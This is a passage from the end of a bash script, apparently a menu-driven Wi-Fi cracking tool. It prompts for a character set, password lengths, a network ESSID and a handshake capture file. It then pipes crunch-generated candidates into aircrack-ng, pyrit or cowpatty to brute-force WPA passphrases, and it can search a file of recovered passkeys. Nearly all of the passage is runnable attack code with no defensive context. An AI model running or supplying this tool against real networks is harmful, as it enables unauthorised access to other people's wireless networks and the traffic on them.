2823. echo $RED"essid$STAND: $essid"
2824. echo
2825. echo $RED"Commands to launch:"
2826. echo "==================="
2827. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -"
2828. echo
2829. # Launch chosen commands/options
2830. #################################
2831. read -p $GREEN"Press enter to start"$STAND
2832. clear
2833. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -
2834. fi
2835. if [[ $option == "5" ]]; then
2836. clear
2837. echo $RED
2838. echo "############################################################################"
2839. echo "# #"
2840. echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
2841. echo "#$STAND (Crunch + Pyrit) $RED#"
2842. echo "# #"
2843. echo "############################################################################"$STAND
2844. echo
2845. echo $RED"eg: abcdef23456789"
2846. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
2847. echo
2848. echo $RED"eg: 10"
2849. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
2850. echo
2851. echo $RED"eg: 10"
2852. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
2853. echo
2854. echo $RED"eg:"
2855. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
2856. echo $RED"-s XXXXXXXXXX = Start point."
2857. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
2858. echo
2859. echo $RED"eg: sky12345"
2860. read -p $GREEN"Access Point essid$STAND: " essid
2861. echo
2862. echo $RED"eg: /root/Desktop/sky12345.cap"
2863. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
2864. clear
2865. # Chosen user input options
2866. ############################
2867. echo
2868. echo $RED"You've chosen:"
2869. echo "=============="
2870. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
2871. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
2872. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
2873. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
2874. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
2875. echo $RED"essid$STAND: $essid"
2876. echo
2877. echo $RED"Commands to launch:"
2878. echo "==================="
2879. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough"
2880. echo
2881. # Launch chosen commands/options
2882. #################################
2883. read -p $GREEN"Press enter to start"$STAND
2884. clear
2885. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough
2886. fi
2887. if [[ $option == "6" ]]; then
2888. clear
2889. echo $RED
2890. echo "############################################################################"
2891. echo "# #"
2892. echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
2893. echo "#$STAND (Crunch + Pyrit + Cowpatty) $RED#"
2894. echo "# #"
2895. echo "############################################################################"$STAND
2896. echo
2897. echo $RED"eg: abcdef23456789"
2898. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
2899. echo
2900. echo $RED"eg: 10"
2901. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
2902. echo
2903. echo $RED"eg: 10"
2904. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
2905. echo
2906. echo $RED"eg:"
2907. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
2908. echo $RED"-s XXXXXXXXXX = Start point."
2909. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
2910. echo
2911. echo $RED"eg: sky12345"
2912. read -p $GREEN"Access Point essid$STAND: " essid
2913. echo
2914. echo $RED"eg: /root/Desktop/sky12345.cap"
2915. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
2916. clear
2917. # Chosen user input options
2918. ############################
2919. echo
2920. echo $RED"You've chosen:"
2921. echo "=============="
2922. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
2923. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
2924. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
2925. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
2926. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
2927. echo $RED"essid$STAND: $essid"
2928. echo
2929. echo $RED"Commands to launch:"
2930. echo "==================="
2931. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
2932. echo
2933. # Launch chosen commands/options
2934. #################################
2935. read -p $GREEN"Press enter to start"$STAND
2936. clear
2937. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
2938. fi
2939. ;;
2940. 7)
2941. ###########################
2942. # Show Recovered Passkeys #
2943. ###########################
2944. gnome-open $HOME/scrypta/Recovered-WPA-Passkeys.txt
2945. ;;
2946. 8)
2947. ##############################################################################
2948. # Check In Recovered-WPA-Passkeys.txt To See If You Already Have The Passkey #
2949. ##############################################################################
2950. ###################
2951. # Passkey Checker #
2952. ###################
2953. clear
2954. echo $RED"How would you like to search."
2955. echo $GREEN"[1]$BLUE = Search using the bssid."
2956. echo $GREEN"[2]$BLUE = Search using the essid."
2957. echo $GREEN"[0]$BLUE = Return To Previous Menu."
2958. echo $GREEN"1, 2 or 0?"$STAND
2959. read option
2960.  
2961. if [[ $option == "1" ]]; then
2962. while true
2963. do
2964. echo -n $GREEN"Please input the bssid of the access point you would like to check for?$STAND: "
2965. read -e SEARCHbssid
2966. grep -B 1 -A 2 $SEARCHbssid $HOME/scrypta/Recovered-WPA-Passkeys.txt
2967. echo
2968. echo -n "Would you like to search again? (y or n): "
2969. read -e CONFIRM
2970. case $CONFIRM in
2971. n|N|NO|no|No)
2972. break ;;
2973. *) echo ""
2974. esac
2975. done
2976. fi
2977. if [[ $option == "2" ]]; then
2978. while true
2979. do
2980. echo -n $GREEN"Please input the essid of the access point you would like to check for?$STAND: "
2981. read -e SEARCHessid
2982. grep -A 3 $SEARCHessid $HOME/scrypta/Recovered-WPA-Passkeys.txt
2983. echo
2984. echo -n "Would you like to search again? (y or n): "
2985. read -e CONFIRM
2986. case $CONFIRM in
2987. n|N|NO|no|No)
2988. break ;;
2989. *) echo ""
2990. esac
2991. done
2992. fi
2993. if [[ $option == "0" ]]; then
2994. echo "Returning To Menu"
2995. fi
2996. ;;
2997. 0) exit 0;;
2998. *) echo "You've chosen an invalid option, please choose again";
2999. echo "Press [Enter] to continue. . ." ; read ;;
3000. esac
3001. done